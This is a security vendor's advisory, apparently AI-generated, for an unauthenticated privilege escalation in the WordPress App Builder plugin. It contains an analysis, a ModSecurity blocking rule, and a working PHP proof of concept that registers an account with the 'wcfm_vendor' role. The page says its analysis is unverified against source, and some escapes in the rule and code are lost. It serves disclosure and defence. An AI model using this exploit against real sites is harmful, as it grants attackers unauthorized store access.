Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 29, 2026

CVE-2026-2375: App Builder – Create Native Android & iOS Apps On The Flight <= 5.5.10 – Unauthenticated Privilege Escalation via 'role' Parameter (app-builder)

CVE ID CVE-2026-2375
Plugin app-builder
Severity Medium (CVSS 6.5)
CWE 269
Vulnerable Version 5.5.10
Patched Version
Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2375 (metadata-based):
The App Builder plugin for WordPress contains an unauthenticated privilege escalation vulnerability in its REST API registration endpoint. Attackers can directly assign the vendor role during user registration, bypassing the WCFM Marketplace approval workflow and immediately gaining vendor-level access on affected sites.

Atomic Edge research identifies the root cause as improper privilege management (CWE-269) within the `verify_role()` function in `AuthTrails.php`. The function explicitly whitelists the `wcfm_vendor` role alongside standard roles like `subscriber` and `customer`. This whitelist approach, without integration with WCFM’s vendor approval system, allows direct role assignment via `wp_insert_user()`. The vulnerability description confirms these details, though Atomic Edge cannot verify the exact code implementation without the plugin source.

Exploitation occurs through the `/wp-json/app-builder/v1/register` REST API endpoint. An unauthenticated attacker sends a POST request with the `role` parameter set to `wcfm_vendor`. The request must include other required registration fields such as `username`, `email`, and `password`. The plugin accepts this role assignment without checking if the user should undergo WCFM’s vendor approval process, creating an account with immediate vendor privileges.

Remediation requires removing the `wcfm_vendor` role from the `verify_role()` function’s whitelist. The plugin should integrate with WCFM Marketplace’s vendor registration workflow instead of assigning the role directly. Vendor accounts must be created through WCFM’s proper channels, which include approval steps. The fix should also validate that users cannot self-assign privileged roles through the registration endpoint.

Successful exploitation grants attackers vendor-level access on sites with WCFM Marketplace active. This includes product management capabilities, order access, and store management functions. Attackers can create and modify products, view customer orders, and potentially manipulate store settings. The vulnerability bypasses business logic controls designed to vet vendors before granting marketplace access.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-2375 (metadata-based)
SecRule REQUEST_URI "@rx ^/wp-json/app-builder/v1/register$" 
  "id:20262375,phase:2,deny,status:403,chain,msg:'CVE-2026-2375: App Builder unauthenticated privilege escalation via role parameter',severity:'CRITICAL',tag:'CVE-2026-2375',tag:'WordPress',tag:'Plugin-App-Builder'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule REQUEST_BODY "@rx "role"s*:s*"wcfm_vendor"" 
      "setvar:'tx.cve_2026_2375_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2375 - App Builder – Create Native Android & iOS Apps On The Flight <= 5.5.10 - Unauthenticated Privilege Escalation via 'role' Parameter

<?php

$target_url = 'https://example.com'; // Change to target WordPress site

// Generate random credentials to avoid collisions
$username = 'vendor_' . bin2hex(random_bytes(4));
$email = $username . '@example.com';
$password = bin2hex(random_bytes(8));

$api_endpoint = $target_url . '/wp-json/app-builder/v1/register';

$payload = [
    'username' => $username,
    'email' => $email,
    'password' => $password,
    'role' => 'wcfm_vendor' // The vulnerable parameter
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Accept: application/json'
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "Target: $target_urln";
echo "Endpoint: $api_endpointn";
echo "Username: $usernamen";
echo "Password: $passwordn";
echo "HTTP Status: $http_coden";
echo "Response: $responsen";

// Check for success indicators
if ($http_code === 200) {
    $response_data = json_decode($response, true);
    if (isset($response_data['success']) && $response_data['success'] === true) {
        echo "[+] SUCCESS: Vendor account likely created with wcfm_vendor role.n";
        echo "[+] Use credentials to log in and verify vendor capabilities.n";
    } else {
        echo "[-] Plugin returned error or unexpected response structure.n";
    }
} else {
    echo "[-] Request failed with HTTP $http_coden";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School